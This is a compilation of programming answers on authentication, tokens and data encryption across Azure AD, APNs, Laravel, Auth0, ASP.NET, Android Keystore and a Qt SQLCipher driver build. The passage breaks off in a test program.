Here are code samples for your reference: //use the Azure AD client library string accessToken = ""; string tenantId = ""; string graphResourceId = "https://graph.windows.net"; Uri servicePointUri = new Uri(graphResourceId); Uri serviceRoot = new Uri(servicePointUri, tenantId); ActiveDirectoryClient client = new ActiveDirectoryClient(serviceRoot, async () => await Task.FromResult(accessToken)); foreach(var user in client.Users.ExecuteAsync().Result.CurrentPage) Console.WriteLine(user.DisplayName); //using the HTTP request var client = new HttpClient(); var tenantId = ""; var uri = $"https://graph.windows.net/{tenantId}/users?api-version=1.6"; var token = ""; client.DefaultRequestHeaders.Authorization = new System.Net.Http.Headers.AuthenticationHeaderValue("bearer", token); var response = client.GetAsync(uri).Result; var result = response.Content.ReadAsStringAsync().Result; Console.WriteLine(result); Update The secret is available for a web application/web API when you create the application. You can generate the key in the keys section, as in the figure below. After you save the app, you can copy the secret.
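The HTTP variant above is just a GET with a bearer Authorization header, so it can be reproduced in any language. As a sketch (in Python rather than the C# of this answer), this builds, without sending, the same "list users" request:

```python
import urllib.request

def graph_users_request(tenant_id, token):
    """Build (but do not send) the Azure AD Graph 'list users' request."""
    uri = "https://graph.windows.net/" + tenant_id + "/users?api-version=1.6"
    req = urllib.request.Request(uri)
    # the access token goes into a standard bearer Authorization header
    req.add_header("Authorization", "Bearer " + token)
    return req
```

Sending it with urllib.request.urlopen(req) would return the same JSON user list that ReadAsStringAsync prints in the C# sample.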
The Key ID and Key are obtained from the Apple Developer account portal. The process is described in the Xcode help and can be found by searching the help for “Configure push notifications.” You create a new Push Notification Authentication key in the Developer portal: Go to Certificates, Identifiers & Profiles, and under Certificates, select All or APNs Auth Key. Click the Add button (+) in the upper-right corner. Under Production, select the “Apple Push Notification Authentication Key (Sandbox & Production)” checkbox, and click Continue. Once you click Continue, you will see the following screen: The Key ID is the KID referred to in the documentation, and when you click Download you will get the private key that is associated with this key ID. You can use this to generate the token, which consists of a header and a claims payload, each a JSON document, in the following format: { "alg": "ES256", "kid": "ABC123DEFG" } { "iss": "DEF123GHIJ", "iat": 1437179036 } where kid is the Key ID and iss is the team identifier, also from the Developer portal. iat is the issued-at time for this token, which is the number of seconds since the Epoch, in UTC. After you create the token, you must sign it (not encrypt it) with the private key that was downloaded from the portal when the kid was generated, using the Elliptic Curve Digital Signature Algorithm (ECDSA) with the P-256 curve and the SHA-256 hash algorithm. To ensure security, APNs requires new tokens to be generated periodically. A new token has an updated issued-at claim key, whose value indicates the time the token was generated. If the timestamp for token issue is not within the last hour, APNs rejects subsequent push messages, returning an ExpiredProviderToken (403) error.
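As an illustration of the header/claims structure described above, the sketch below (Python, standard library only) builds the base64url-encoded signing input of an APNs provider token. The ES256 signature over this string requires the downloaded .p8 private key and a crypto library (e.g. PyJWT or cryptography) and is deliberately not shown; the key ID and team ID values are the placeholders from the answer.

```python
import base64
import json

def b64url(data):
    """Base64url-encode without trailing '=' padding, per JWT convention."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def apns_signing_input(key_id, team_id, issued_at):
    """Build the 'header.claims' part of an APNs provider token (a JWT).

    The returned string must still be signed with the .p8 private key
    using ES256 (P-256 + SHA-256); appending that signature as a third
    dot-separated segment yields the finished token.
    """
    header = {"alg": "ES256", "kid": key_id}
    claims = {"iss": team_id, "iat": issued_at}
    return b64url(json.dumps(header).encode()) + "." + b64url(json.dumps(claims).encode())
```

Regenerating the token with a fresh iat at least once an hour avoids the ExpiredProviderToken (403) rejection mentioned above.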
Try changing your $event = Event::find($id) to $event = Event::findOrFail($id). As far as I remember, it'll throw a ModelNotFoundException if it can't find anything for that id. Go to app/Exceptions/Handler.php and, inside the render method, catch the exception and handle it. Edited: if ($e instanceof HttpResponseException) { return $e->getResponse(); } elseif ($e instanceof ModelNotFoundException) { $e = new NotFoundHttpException($e->getMessage(), $e); } elseif ($e instanceof AuthenticationException) { return $this->unauthenticated($request, $e); } elseif ($e instanceof AuthorizationException) { $e = new HttpException(403, $e->getMessage()); } elseif ($e instanceof ValidationException && $e->getResponse()) { return $e->getResponse(); } You can see that the parent render method fires a NotFoundHttpException if it gets a ModelNotFoundException. I guess you can override it to match your requirement.
Unfortunately he wants me to use some other framework, or even a core PHP implementation with PDO You, as a developer, have the ability to tell your client why he might be wrong about this. If the website/application is built with SilverStripe then he should have a very good/specific reason not to continue to use it to implement an API over the top of the SilverStripe data - it makes perfect sense to use SilverStripe for this, and little sense to rewrite parts of the SilverStripe framework for the sake of "not using SilverStripe." It's also important to mention to your client that the underlying encryption/hashing algorithms that SilverStripe implements are not part of its public API, and hence can change without requiring explicit notice given to developers. This could mean that the default algorithm could be changed (for example if a zero-day exploit is found in the blowfish algorithm) and your mobile app would then stop working. Using a SilverStripe API would not have this same problem. The above also applies to the general data structure of SilverStripe. Let's assume that one day they decide to move away from flat tables into an EAV database storage design - their public API (classes with public methods) will stay the same while their backend classes that separate the accessibility from the processing and data storage will change. You will have to update your API too, if you build it yourself! How does SilverStripe encrypt its passwords? It depends - the default method is encryption with the blowfish algorithm, but there are a half dozen or so (in 3.4.1) implementations of the PasswordEncryptor class that could be configured for use. The algorithm to use is configurable via the Security::$password_encryption_algorithm property, or via YAML config. Each user could have a different password encryption/hashing algorithm used - take a look at the Member database table under the PasswordEncryption column. 
How do I manually authenticate users using plain PHP Theoretically if you wanted to do this, you'd need to recreate most of the logic in the framework's authenticator. Start by looking at Member::checkPassword - this is the initiation of the logic to check the password against the member - which is what you'll care about. You'll find yourself assuming that most implementations of SilverStripe will use the default algorithm of blowfish encryption, and follow PasswordEncryptor::create_for_algorithm through to PasswordEncryptor_Blowfish::check. At this point you'll see that you literally will end up replicating an amount of the SilverStripe framework's code to be able to achieve what you want. Summary What you want to achieve will involve a lot of duplication It will not work for 100% of SilverStripe implementations It may work now, but will break at some point when the algorithms change Ask your client why, and convince them to change their mind about it (after all, you're the expert, they're the client) Use a SilverStripe API module (a couple listed below) API modules silverstripe/silverstripe-restfulserver - Officially supported, and provides a simple and easy way to get started with providing API access to your SilverStripe system. You have basic control over the HTTP request methods, and can limit access and permissions by each DataObject. colymba/silverstripe-restfulapi - Community module. Arguably more flexible and powerful. Slightly more work to set up/configure the way you want it to work.
For the Auth0 scenario you can accomplish this by leveraging the rules functionality to customize the authentication pipeline of the user. Rules allow you to easily customize and extend Auth0's capabilities. Rules can be chained together for modular coding and can be turned on and off individually. More specifically, you can use a redirect based rule to ensure that the user provides the necessary additional information in the cases where the original method of authentication is unable or lacks said information. Rules can also be used to programmatically redirect users before an authentication transaction is complete, allowing the implementation of custom authentication flows which require input on behalf of the user, such as: Requiring users to provide additional verification when logging in from unknown locations. Implementing custom verification mechanisms (e.g. proprietary multifactor authentication providers). Forcing users to change passwords. (emphasis is mine) Your concrete scenario would be very similar to the first point mentioned, you would detect a specific situation, in your case, the user does not have birthday and city information available, and conditionally redirect the user to a form that would collect this information which would then upon submission resume the authentication process. Depending on the amount of data in question and/or specific data storage requirements you might have you could either store the collected data as part of the Auth0 user profile in what's referred to as user metadata or use your own store. Auth0 allows you to store metadata, or data related to each user that has not come from the identity provider. 
There are two kinds of metadata: user_metadata: stores user attributes (such as user preferences) that do not impact a user's core functionality; app_metadata: stores information (such as a user's support plan, security roles, or access control groups) that can impact a user's core functionality, such as how an application functions or what the user can access. For guidance on what are the use cases for the Auth0 metadata storage also check User Data Storage Guidance.
I solved it with the following code. In AccountController: [Authorize(Roles="Administrators")] public async Task<IActionResult> ImpersonateUser(string id) { var appUser = await _userManager.FindByIdAsync(id); var userPrincipal = await _signInManager.CreateUserPrincipalAsync(appUser); userPrincipal.Identities.First().AddClaim(new Claim("OriginalUserId", User.FindFirst(x=>x.Type == ClaimTypes.NameIdentifier).Value)); await _signInManager.SignOutAsync(); //sign out the current user //https://github.com/aspnet/Identity/blob/dev/src/Microsoft.AspNetCore.Identity/IdentityCookieOptions.cs await HttpContext.Authentication.SignInAsync("Identity.Application", userPrincipal); //impersonate the new user return RedirectToAction("Index", "Home"); } public async Task<IActionResult> StopImpersonation() { var originalUserId = User.Claims.First(x => x.Type == "OriginalUserId").Value; var appUser = await _userManager.FindByIdAsync(originalUserId); await _signInManager.SignInAsync(appUser, false); return RedirectToAction("Index", "Home"); } Basically this adds the claim OriginalUserId to the impersonated user. By checking if this claim exists I know I'm currently impersonating and can provide a way back to the original account using the code in StopImpersonation. The authentication scheme Identity.Application is the default.
The attachments sent by the user will end up in the Attachments collection of the IMessageActivity. There you will find the URL of the attachment the user sent. Then, you will have to download the attachment and add your logic to upload it to Blob storage or any other storage you would like to use. Here is a C# example showing how to access and download the attachments sent by the user. Added the code below for your reference: public virtual async Task MessageReceivedAsync(IDialogContext context, IAwaitable<IMessageActivity> argument) { var message = await argument; if (message.Attachments != null && message.Attachments.Any()) { var attachment = message.Attachments.First(); using (HttpClient httpClient = new HttpClient()) { // Skype attachment URLs are secured by a JwtToken, so we need to pass the token from our bot. if (message.ChannelId.Equals("skype", StringComparison.InvariantCultureIgnoreCase) && new Uri(attachment.ContentUrl).Host.EndsWith("skype.com")) { var token = await new MicrosoftAppCredentials().GetTokenAsync(); httpClient.DefaultRequestHeaders.Authorization = new AuthenticationHeaderValue("Bearer", token); } var responseMessage = await httpClient.GetAsync(attachment.ContentUrl); var contentLenghtBytes = responseMessage.Content.Headers.ContentLength; await context.PostAsync($"Attachment of {attachment.ContentType} type and size of {contentLenghtBytes} bytes received."); } } else { await context.PostAsync("Hi there! I'm a bot created to show you how I can receive message attachments, but no attachment was sent to me. Please, try again sending a new message including an attachment."); } context.Wait(this.MessageReceivedAsync); }
Raj, by default the token is not stored by the server. Only your client has it, and the client sends it through the Authorization header to the server. If you used the default template provided by Visual Studio, the following IAppBuilder extension is called in the Startup ConfigureAuth method: app.UseOAuthBearerTokens(OAuthOptions). This extension, coming from the Microsoft.AspNet.Identity.Owin package, makes it easy for you to generate and consume tokens, but it is confusing because it is an all-in-one. Behind the scenes it uses two OWIN middlewares: OAuthAuthorizationServerMiddleware: authorizes and delivers tokens. OAuthBearerAuthenticationMiddleware: runs at PipelineStage.Authenticate; it reads the Authorization header, checks whether the token is valid, and authenticates the user. To answer your questions: WebAPI is able to validate the token thanks to the OAuthBearerAuthenticationMiddleware, which ensures that the token sent through the Authorization header is valid and not expired. And the token is stored only by your client; if the client loses it, it will have to request a new one. I advise you to dig deeper into the OAuth protocol and, instead of using the extension UseOAuthBearerTokens, take a look at UseOAuthAuthorizationServer and UseOAuthBearerAuthentication; it will help you to better understand how it works.
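The reason the server does not need to store the token is that a bearer token is self-contained: the server only recomputes and checks a signature and an expiry at request time. This is a minimal, language-agnostic sketch of that idea (Python with an HMAC signature for brevity; the actual OWIN middleware uses its own token format and protection keys, so treat every name here as illustrative):

```python
import hashlib
import hmac
import time

SECRET = b"server-side signing key"  # hypothetical; known only to the server

def issue(user, lifetime=3600):
    """Issue a self-contained token: payload plus an HMAC signature over it."""
    expires = str(int(time.time()) + lifetime)
    payload = user + "|" + expires
    sig = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return payload + "|" + sig

def validate(token):
    """Return the user name if signature and expiry check out, else None.

    Nothing is looked up in storage: the token carries everything needed.
    """
    user, expires, sig = token.rsplit("|", 2)
    payload = user + "|" + expires
    expected = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None  # tampered token
    if int(expires) < time.time():
        return None  # expired token
    return user
```

This is also why a lost token cannot be "recovered" from the server: the client simply has to request a new one.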
Simplified example of controller using IAuthenticationManager using Microsoft.Owin.Security; using System.Web; //...other usings public class AccountController : Controller { [HttpPost] [ActionName("Login")] public ActionResult Login(LoginViewModel model) { if (ModelState.IsValid) { string userName = (string)Session["UserName"]; string[] userRoles = (string[])Session["UserRoles"]; ClaimsIdentity identity = new ClaimsIdentity(DefaultAuthenticationTypes.ApplicationCookie); identity.AddClaim(new Claim(ClaimTypes.NameIdentifier, userName)); userRoles.ToList().ForEach((role) => identity.AddClaim(new Claim(ClaimTypes.Role, role))); identity.AddClaim(new Claim(ClaimTypes.Name, userName)); AuthenticationManager.SignIn(identity); return RedirectToAction("Success"); } else { return View("Login",model); } } private IAuthenticationManager AuthenticationManager { get { return HttpContext.GetOwinContext().Authentication; } } }
I had the same problem: I wanted the key to be configurable. The only solution I found is to update the annotation values at runtime. Yes, I know this sounds awful, but as far as I know there is no other way. Entity class: @Entity @Table(name = "user") public class User implements Serializable { @Column(name = "password") @ColumnTransformer(read = "AES_DECRYPT(password, '${encryption.key}')", write = "AES_ENCRYPT(?, '${encryption.key}')") private String password; } I implemented a class that replaces ${encryption.key} with another value (in my case loaded from the Spring application context): import org.hibernate.annotations.ColumnTransformer; import org.springframework.beans.factory.annotation.Value; import org.springframework.stereotype.Component; import java.lang.annotation.Annotation; import java.lang.reflect.Field; import java.lang.reflect.Proxy; import java.util.Map; import javax.annotation.PostConstruct; @Component(value = "transformerColumnKeyLoader") public class TransformerColumnKeyLoader { public static final String KEY_ANNOTATION_PROPERTY = "${encryption.key}"; @Value(value = "${secret.key}") private String key; @PostConstruct public void postConstruct() { setKey(User.class, "password"); } private void setKey(Class<?> clazz, String columnName) { try { Field field = clazz.getDeclaredField(columnName); ColumnTransformer columnTransformer = field.getDeclaredAnnotation(ColumnTransformer.class); updateAnnotationValue(columnTransformer, "read"); updateAnnotationValue(columnTransformer, "write"); } catch (NoSuchFieldException | SecurityException e) { throw new RuntimeException( String.format("Encryption key cannot be loaded into %s,%s", clazz.getName(), columnName)); } } @SuppressWarnings("unchecked") private void updateAnnotationValue(Annotation annotation, String annotationProperty) { Object handler = Proxy.getInvocationHandler(annotation); Field memberValuesField; try { memberValuesField = handler.getClass().getDeclaredField("memberValues"); } catch (NoSuchFieldException | SecurityException e) { throw new IllegalStateException(e); } memberValuesField.setAccessible(true); Map<String, Object> memberValues; try { memberValues = (Map<String, Object>) memberValuesField.get(handler); } catch (IllegalArgumentException | IllegalAccessException e) { throw new IllegalStateException(e); } Object oldValue = memberValues.get(annotationProperty); if (oldValue == null || oldValue.getClass() != String.class) { throw new IllegalArgumentException(String.format( "Annotation value should be String. Current value is of type: %s", oldValue.getClass().getName())); } String oldValueString = oldValue.toString(); if (!oldValueString.contains(TransformerColumnKeyLoader.KEY_ANNOTATION_PROPERTY)) { throw new IllegalArgumentException( String.format("Annotation value should contain %s. Current value is: %s", TransformerColumnKeyLoader.KEY_ANNOTATION_PROPERTY, oldValueString)); } String newValueString = oldValueString.replace(TransformerColumnKeyLoader.KEY_ANNOTATION_PROPERTY, key); memberValues.put(annotationProperty, newValueString); } } This code should run before the EntityManager is created. In my case I used depends-on (for XML config; use @DependsOn for Java config): <bean id="entityManagerFactory" class="org.springframework.orm.jpa.LocalContainerEntityManagerFactoryBean" depends-on="transformerColumnKeyLoader"> ... </bean>
This is not to do with Shiny, but with whatever server you're storing the data on, how you're using encryption/hashing, and the software/app security methods you've used to protect against specific vulnerabilities. Having said that, here's the (rather minimal, IMHO) security statement for shinyapps.io: shinyapps.io is secure-by-design. Each Shiny application runs in its own protected environment and access is always SSL encrypted. Standard and Professional plans offer user authentication, preventing anonymous visitors from being able to access your applications. I would say that the burden will fall heavily on you to use good encryption and data storage practices. There are many official and unofficial guidelines you can look to for guidance on data storage. One which big companies, particularly companies going public, must follow is Sarbanes-Oxley. From grtcorp.com: The Sarbanes-Oxley Act (SOX Act) was passed by Congress and signed into law in 2002 in response to major cases of financial fraud, of which the rise and collapse of Enron is the best known. The overall focus of the measure is on financial reporting responsibilities, and ensuring that financial audits are genuinely independent. However, SOX also includes provisions that relate to the security and preservation of financial data. And the standards set out for its implementation "recognized that senior management can't just certify controls ON the system, these controls also have to control the way financial information is generated, accessed, collected, stored, processed, transmitted, and used through the system." Senior management is thus held ultimately responsible for financial data security, including putting in place appropriate controls and procedures to ensure this data security. The good news is that powerful tools, including data discovery and Data Masking, are available to meet these standards. 
I would also encourage you to familiarize yourself with OWASP's list of the top 10 major web app vulnerabilities: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
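On the encryption/hashing side of "good practices", the usual baseline for any stored credential is a salted, deliberately slow hash rather than a plain digest. A minimal sketch using only Python's standard library (the iteration count and storage format here are illustrative, not a recommendation for your exact deployment):

```python
import hashlib
import hmac
import os

def hash_password(password, iterations=200_000):
    """Derive a salted PBKDF2-SHA256 hash and store salt + parameters with it."""
    salt = os.urandom(16)  # fresh random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "{}${}${}".format(iterations, salt.hex(), digest.hex())

def verify_password(password, stored):
    """Recompute the hash with the stored salt and compare in constant time."""
    iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)
```

Because the salt and iteration count travel with the stored string, parameters can be raised over time without invalidating old records.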
So to do this I ended up encrypting the users pin in to shared preferences and then decrypting when the fingerprint auth was successful: So to save the pin: private static final String CHARSET_NAME = "UTF-8"; private static final String ANDROID_KEY_STORE = "AndroidKeyStore"; private static final String TRANSFORMATION = KeyProperties.KEY_ALGORITHM_AES + "/" + KeyProperties.BLOCK_MODE_CBC + "/" + KeyProperties.ENCRYPTION_PADDING_PKCS7; private static final int AUTHENTICATION_DURATION_SECONDS = 30; private KeyguardManager keyguardManager; private static final int SAVE_CREDENTIALS_REQUEST_CODE = 1; public void saveUserPin(String pin) throws NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, UnsupportedEncodingException, BadPaddingException, IllegalBlockSizeException { // encrypt the password try { SecretKey secretKey = createKey(); Cipher cipher = Cipher.getInstance(TRANSFORMATION); cipher.init(Cipher.ENCRYPT_MODE, secretKey); byte[] encryptionIv = cipher.getIV(); byte[] passwordBytes = pin.getBytes(CHARSET_NAME); byte[] encryptedPasswordBytes = cipher.doFinal(passwordBytes); String encryptedPassword = Base64.encodeToString(encryptedPasswordBytes, Base64.DEFAULT); // store the login data in the shared preferences // only the password is encrypted, IV used for the encryption is stored SharedPreferences.Editor editor = BaseActivity.prefs.edit(); editor.putString("password", encryptedPassword); editor.putString("encryptionIv", Base64.encodeToString(encryptionIv, Base64.DEFAULT)); editor.apply(); } catch (UserNotAuthenticatedException e) { e.printStackTrace(); showAuthenticationScreen(SAVE_CREDENTIALS_REQUEST_CODE); } } private SecretKey createKey() { try { KeyGenerator keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, ANDROID_KEY_STORE); keyGenerator.init(new KeyGenParameterSpec.Builder(Constants.KEY_NAME, KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT) .setBlockModes(KeyProperties.BLOCK_MODE_CBC) 
.setUserAuthenticationRequired(true) .setUserAuthenticationValidityDurationSeconds(AUTHENTICATION_DURATION_SECONDS) .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7) .build()); return keyGenerator.generateKey(); } catch (NoSuchAlgorithmException | NoSuchProviderException | InvalidAlgorithmParameterException e) { throw new RuntimeException("Failed to create a symmetric key", e); } } Then to decrypt: public String getUserPin() throws KeyStoreException, CertificateException, NoSuchAlgorithmException, IOException, NoSuchPaddingException, UnrecoverableKeyException, InvalidAlgorithmParameterException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException { // load login data from shared preferences ( // only the password is encrypted, IV used for the encryption is loaded from shared preferences SharedPreferences sharedPreferences = BaseActivity.prefs; String base64EncryptedPassword = sharedPreferences.getString("password", null); String base64EncryptionIv = sharedPreferences.getString("encryptionIv", null); byte[] encryptionIv = Base64.decode(base64EncryptionIv, Base64.DEFAULT); byte[] encryptedPassword = Base64.decode(base64EncryptedPassword, Base64.DEFAULT); // decrypt the password KeyStore keyStore = KeyStore.getInstance(ANDROID_KEY_STORE); keyStore.load(null); SecretKey secretKey = (SecretKey) keyStore.getKey(Constants.KEY_NAME, null); Cipher cipher = Cipher.getInstance(TRANSFORMATION); cipher.init(Cipher.DECRYPT_MODE, secretKey, new IvParameterSpec(encryptionIv)); byte[] passwordBytes = cipher.doFinal(encryptedPassword); String string = new String(passwordBytes, CHARSET_NAME); return string; } The showAuthenticationScreen method that is called looks like this: private void showAuthenticationScreen(int requestCode) { Intent intent = keyguardManager.createConfirmDeviceCredentialIntent(null, null); if (intent != null) { startActivityForResult(intent, requestCode); } } And then to get the result back from showAuthenticationScreen just override 
onActivityResult and call saveUserPin or getUserPin again whichever is required.
How to build the Qt-SQL-driver-plugin 'QSQLCIPHER' for SQLite-DB with SQLCipher-extension using the Windows/MinGW-platform: Qt 5.4.0 for Windows/MinGW Download Qt Install including the sources e.g to C:\Qt\Qt5.4.0 OpenSSL for Windows Download Win32 OpenSSL v1.0.2a Download Visual C++ 2008 Redistributable Install Visual C++ 2008 Redistributable by executing 'vcredist_x86.exe' Install OpenSSL v1.0.2a by executing 'Win32OpenSSL-1_0_2.exe' Target directory e.g. C:\OpenSSL-Win32 During installation choose the option to install the libraries to the Windows system directory (C:\Windows\SysWOW64) MinGW - Minimalist GNU for Windows Download and install 'mingw-get-setup.exe' Start of MinGW Installer Installation of MSYS Base System Selection: All Packages -> MSYS -> MSYS Base System Select msys-base (Class 'bin') for installation Menu: installation -> apply changes Installation of files by default to directory C:\MinGW Installation of Tcl/Tk Selection: All Packages -> MinGW -> MinGW Contributed Select 'mingw32-tcl' and 'mingw32-tk' (Class 'bin') for installation Menu: installation -> apply changes Installation of files by default to directory C:\MinGW Copy content of C:\MinGW to the Qt-MinGW-directory C:\Qt\Qt5.4.0\Tools\mingw491_32 Create file 'fstab' in C:\Qt\Qt5.4.0\Tools\mingw491_32\msys\1.0\etc Insert content as follows: #Win32_Path Mount_Point C:/Qt/Qt5.4.0/Tools/mingw491_32 /mingw C:/Qt/Qt5.4.0/5.4 /qt C:/ /c zlib-Library Download zlib-dll-Binaries Extract and copy file 'zlib1.dll' to the Qt-MinGW-directory C:\Qt\Qt5.4.0\Tools\mingw491_32\msys\1.0\bin SQLCipher Download the SQLCipher-zip-file Extract the zip-file e.g. 
to C:\temp\sqlcipher-master Copy OpenSSL-Win32-libraries Copy C:\OpenSSL-Win32\bin\libeay32.dll to C:\temp\sqlcipher-master Copy C:\OpenSSL-Win32\lib\libeay32.lib to C:\temp\sqlcipher-master Build SQLCipher.exe Execute MSYS: C:\Qt\Qt5.4.0\Tools\mingw491_32\msys\1.0\msys.bat $ cd /c/temp/sqlcipher-master $ ./configure --prefix=$(pwd)/dist --with-crypto-lib=none --disable-tcl CFLAGS="-DSQLITE_HAS_CODEC -DSQLCIPHER_CRYPTO_OPENSSL -I/c/openssl-win32/include /c/temp/sqlcipher-master/libeay32.dll -L/c/temp/sqlcipher-master/ -static-libgcc" LDFLAGS="-leay32" $ make clean $ make sqlite3.c $ make $ make dll $ make install Save the executable SQLite/SQLCipher-database e.g. to C:\sqlcipher Copy C:\temp\sqlcipher-master\dist\bin\sqlcipher.exe to C:\sqlcipher. The file 'sqlcipher.exe' is the crypting equivalent to the non-crypting original command line interface 'sqlite3.exe'. Copy C:\temp\sqlcipher-master\sqlite3.dll to C:\sqlcipher. This file is the SQLite-library extended by the encryption. The SQLite-database with SQLCipher-extension is now ready for work. 
Build Qt-QSQLCIPHER-driver-plugin Create directory: C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\plugins\sqldrivers\sqlcipher Create the following three files within the new directory: File 1: smain.cpp: #include <qsqldriverplugin.h> #include <qstringlist.h> #include "../../../../src/sql/drivers/sqlite/qsql_sqlite_p.h" // There was a missing " at the end of this line QT_BEGIN_NAMESPACE class QSQLcipherDriverPlugin : public QSqlDriverPlugin { Q_OBJECT Q_PLUGIN_METADATA(IID "org.qt-project.Qt.QSqlDriverFactoryInterface" FILE "sqlcipher.json") public: QSQLcipherDriverPlugin(); QSqlDriver* create(const QString &); }; QSQLcipherDriverPlugin::QSQLcipherDriverPlugin() : QSqlDriverPlugin() { } QSqlDriver* QSQLcipherDriverPlugin::create(const QString &name) { if (name == QLatin1String("QSQLCIPHER")) { QSQLiteDriver* driver = new QSQLiteDriver(); return driver; } return 0; } QT_END_NAMESPACE #include "smain.moc" File 2: sqlcipher.pro TARGET = qsqlcipher SOURCES = smain.cpp OTHER_FILES += sqlcipher.json include(../../../sql/drivers/sqlcipher/qsql_sqlite.pri) wince*: DEFINES += HAVE_LOCALTIME_S=0 PLUGIN_CLASS_NAME = QSQLcipherDriverPlugin include(../qsqldriverbase.pri) File 3: sqlcipher.json { "Keys": [ "QSQLCIPHER" ] } Copy directory C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\sql\drivers\sqlite to C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\sql\drivers\sqlcipher Customize file C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\sql\drivers\sqlcipher\qsql_sqlite.pri The content of the file shall be like: HEADERS += $$PWD/qsql_sqlite_p.h SOURCES += $$PWD/qsql_sqlite.cpp !system-sqlite:!contains(LIBS, .*sqlite3.*) { include($$PWD/../../../3rdparty/sqlcipher.pri) #<-- change path of sqlite.pri to sqlcipher.pri here ! } else { LIBS += $$QT_LFLAGS_SQLITE QMAKE_CXXFLAGS *= $$QT_CFLAGS_SQLITE } The remaining two files in this directory need not to be changed. 
Create file 'sqlcipher.pri' in directory C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\3rdparty with the following content: CONFIG(release, debug|release):DEFINES *= NDEBUG DEFINES += SQLITE_OMIT_LOAD_EXTENSION SQLITE_OMIT_COMPLETE SQLITE_ENABLE_FTS3 SQLITE_ENABLE_FTS3_PARENTHESIS SQLITE_ENABLE_RTREE SQLITE_HAS_CODEC !contains(CONFIG, largefile):DEFINES += SQLITE_DISABLE_LFS contains(QT_CONFIG, posix_fallocate):DEFINES += HAVE_POSIX_FALLOCATE=1 winrt: DEFINES += SQLITE_OS_WINRT winphone: DEFINES += SQLITE_WIN32_FILEMAPPING_API=1 qnx: DEFINES += _QNX_SOURCE INCLUDEPATH += $$PWD/sqlcipher c:/openssl-win32/include SOURCES += $$PWD/sqlcipher/sqlite3.c LIBS += -L$$PWD/sqlcipher/lib -lsqlcipher -leay32 -lsqlite3 TR_EXCLUDE += $$PWD/* Create and fill C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\3rdparty\sqlcipher Create the two directories: C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\3rdparty\sqlcipher C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\3rdparty\sqlcipher\lib Copy the following files to C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\3rdparty\sqlcipher: C:\temp\sqlcipher-master\shell.c C:\temp\sqlcipher-master\sqlite3.c C:\temp\sqlcipher-master\sqlite3.h C:\temp\sqlcipher-master\sqlite3ext.h Copy the following files/directories to C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\3rdparty\sqlcipher\lib: C:\temp\sqlcipher-master\dist\lib C:\temp\sqlcipher-master\sqlite3.dll C:\OpenSSL-Win32\bin\libeay32.dll The directory now consists of the following files and directories: C:\QT\QT5.4.0\5.4\SRC\QTBASE\SRC\3RDPARTY\SQLCIPHER | shell.c | sqlite3.c | sqlite3.h | sqlite3ext.h | \---lib | libeay32.dll | libsqlcipher.a | libsqlcipher.la | sqlite3.dll | \---pkgconfig sqlcipher.pc Compile the QSQLCIPHER-driver-plugin for Qt: Open Qt-command line C:\Windows\System32\cmd.exe /A /Q /K C:\Qt\Qt5.4.0\5.4\mingw491_32\bin\qtenv2.bat Execute the following commands: cd C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\plugins\sqldrivers\sqlcipher qmake mingw32-make This builds the QSQLCIPHER-driver-plugin within the following directory: 
C:\QT\QT5.4.0\5.4\SRC\QTBASE\PLUGINS\SQLDRIVERS
    libqsqlcipher.a
    libqsqlcipherd.a
    qsqlcipher.dll
    qsqlcipherd.dll

Copy 'qsqlcipher.dll' and 'qsqlcipherd.dll' to the SQL-driver-plugin directory C:\Qt\Qt5.4.0\5.4\mingw491_32\plugins\sqldrivers.

Create a new encrypted SQLite/SQLCipher database

Create a new SQLite plaintext database 'plaintext.db' with a test table and some test data. Change directory to C:\sqlcipher, which contains 'sqlcipher.exe' and 'sqlite3.dll' (see above).

C:\sqlcipher>sqlcipher.exe plaintext.db
SQLCipher version 3.8.6 2014-08-15 11:46:33
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> create table testtable (id integer, name text);
sqlite> insert into testtable (id,name) values(1,'Bob');
sqlite> insert into testtable (id,name) values(2,'Charlie');
sqlite> insert into testtable (id,name) values(3,'Daphne');
sqlite> select * from testtable;
1|Bob
2|Charlie
3|Daphne
sqlite> .exit

Open C:\sqlcipher\plaintext.db using a standard text editor: the database schema and test data can be read in plaintext.

Encrypting the plaintext database

This will create the database C:\sqlcipher\encrypted.db using the key 'testkey'.

C:\sqlcipher>sqlcipher.exe plaintext.db
SQLCipher version 3.8.6 2014-08-15 11:46:33
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> ATTACH DATABASE 'encrypted.db' AS encrypted KEY 'testkey';
sqlite> SELECT sqlcipher_export('encrypted');
sqlite> DETACH DATABASE encrypted;
sqlite> .exit

Open C:\sqlcipher\encrypted.db using a standard text editor: the data are now encrypted. For more useful information visit: https://www.zetetic.net/sqlcipher/sqlcipher-api/

Usage of the SQLite database with SQLCipher extension and access via Qt

Create a new Qt command-line project, e.g.
'qsqlcipher'

Project file:

QT += core sql
QT -= gui
TARGET = qsqlcipher
CONFIG += console
CONFIG -= app_bundle
TEMPLATE = app
SOURCES += main.cpp

Test program 'main.cpp':

#include <QCoreApplication>
#include <QSqlDatabase>
#include <QSqlQuery>
#include <QDebug>
#include <QString>

